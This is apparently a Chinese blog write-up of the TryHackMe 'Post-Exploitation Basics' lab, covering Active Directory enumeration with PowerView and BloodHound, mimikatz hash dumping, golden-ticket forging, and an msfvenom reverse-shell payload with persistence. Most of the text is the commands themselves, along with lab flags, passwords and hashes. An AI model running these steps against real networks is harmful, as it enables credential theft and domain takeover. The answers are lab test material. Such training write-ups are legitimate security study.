TryHackMe-Post-Exploitation Basics

MssnHarvey

发布于 2022-12-30 15:53:28

1.2K0

发布于 2022-12-30 15:53:28

文章被收录于专栏：HarveyHarvey

任务1 介绍

任务2 带 Powerview 的枚举

首先我们要在绕过执行策略的情况下启动 PowerShell，以便我们可以运行脚本

powershell -ep bypass

接着我们可以启动 PowerView 并枚举域用户

. .\Downloads\PowerView.ps1
Get-NetUser | select cn

还可以枚举域组

Get-NetGroup -GroupName *admin*

PowerView 备忘单：https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993

问题1：默认没有设置的共享文件夹是什么？

回答：Share

Invoke-ShareFinder

问题2：除了 Windows Server 2019，网络内部运行的是什么操作系统？

回答：Windows 10 Enterprise Evaluation

Get-NetComputer -fulldata | select operatingsystem

问题3：我在用户内部隐藏了一个标志找到它

回答：POST{P0W3RV13W_FTW}

任务3 带 Bloodhound 的枚举

首先安装Bloodhound

apt-get install bloodhound

使用 SHARPHOUND 获取loot

# 在绕过执行策略的情况下从cmd启动PowerShell
powershell -ep bypass
# 运行Sharphound PowerShell脚本
. .\Downloads\SharpHound.ps1
# 使用Sharphound收集所有信息并将其存储在zip文件中
Invoke-Bloodhound -CollectionMethod All -Domain CONTROLLER.local -ZipFileName loot.zip

再使用scp将zip文件传输回kali

scp Administrator@10.10.135.137:20221229050642_loot.zip 20221229050642_loot.zip

接着用Bloodhound映射网络

需要在另一个终端启动Bloodhound之前先启动neo4j（neo4j 5.x的要使用jdk17，4.x版本使用jdk11

./neo4j console

neo4j 默认凭据：neo4j:neo4j，需要我们访问http://localhost:7474/browser/去更改它，否则后面登录会出错

连接后，它会自动提示我们输入新密码

然后启动Bloodhound

bloodhound

点击Import Graph，导入zip文件

但是他这里报错说是bad json file

于是需要上传最新版本sharphound

scp SharpHound.exe Administrator@10.10.135.137:SharpHound.exe

然后再用它来获取loot.zip

SharpHound.exe  --collectionmethods All --domain CONTROLLER.local --zipfilename loot.zip

再通过scp将loot.zip传输到kali

scp Administrator@10.10.135.137:20221229062748_loot.zip 20221229062748_loot.zip

接着导入就可以成功分析Bloodhound

问题1：什么服务也是域管理员

回答：SQLSERVICE

点击“Find all Domain Admins”得到如下：

问题2：哪两个用户是 Kerberoastable 的？

回答：SQLSERVICE,KRBTGT

点击“List all Kerberoastable Accounts”得到如下：

任务4 使用 mimikatz 转储哈希

cd Downloads && mimikatz.exe
privilege::debug
lsadump::lsa /patch

问题1：Machine1 密码是什么？

回答：Password1

问题2：什么是 Machine2 哈希？

回答：c39f2beb3d2ec06a62cb887fb391dee0

任务5 带有 mimikatz 的金票攻击

cd Downloads && mimikatz.exe
privilege::debug
lsadump::lsa /inject /name:krbtgt

通过krbtgt的sid和password hash创建Administrator的黄金票据

# kerberos::golden /user: /domain: /sid: /krbtgt: /id:
kerberos::golden /user:Administrator /domain:controller.local /sid:S-1-5-21-849420856-2351964222-986696166 /krbtgt:5508500012cc005cf7082a9a89ebdfdf /id:500

打开一个新的命令提示符，对所有机器都具有提升的权限

misc::cmd

任务6 带服务器管理器的枚举

连接远程桌面

rdesktop -u Administrator -d CONTROLLER 10.10.135.137

使用服务器管理器枚举

问题1：什么工具可以查看事件日志？

回答：Event Viewer

点击”Tools“ - ”Event Viewer“查看如下：

问题2：什么是 SQL 服务密码

回答：MYpassword123#

点击”Tools“ - ”Active Directory Users and Computers“查看如下：

任务7 维护访问

首先msf生成一个马

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.150.128 lport=4444 -f exe > shell.exe

再通过scp上传shell.exe

scp shell.exe Administrator@10.10.135.137:shell.exe

msf成功上线

use exploit/multi/handler
set lhost 10.18.98.53
set payload windows/meterpreter/reverse_tcp
run

运行持久化模块

bg
use exploit/windows/local/persistence
set session 1
run

任务8 结论

本文参与腾讯云自媒体同步曝光计划，分享自作者个人站点/博客。

原始发表：2022-12-30，如有侵权请联系 cloudcommunity@tencent.com 删除

linux

编程算法

windows

本文分享自作者个人站点/博客前往查看

如有侵权，请联系 cloudcommunity@tencent.com 删除。

本文参与腾讯云自媒体同步曝光计划，欢迎热爱写作的你一起参与！

linux

编程算法

windows

登录后参与评论

0 条评论

热度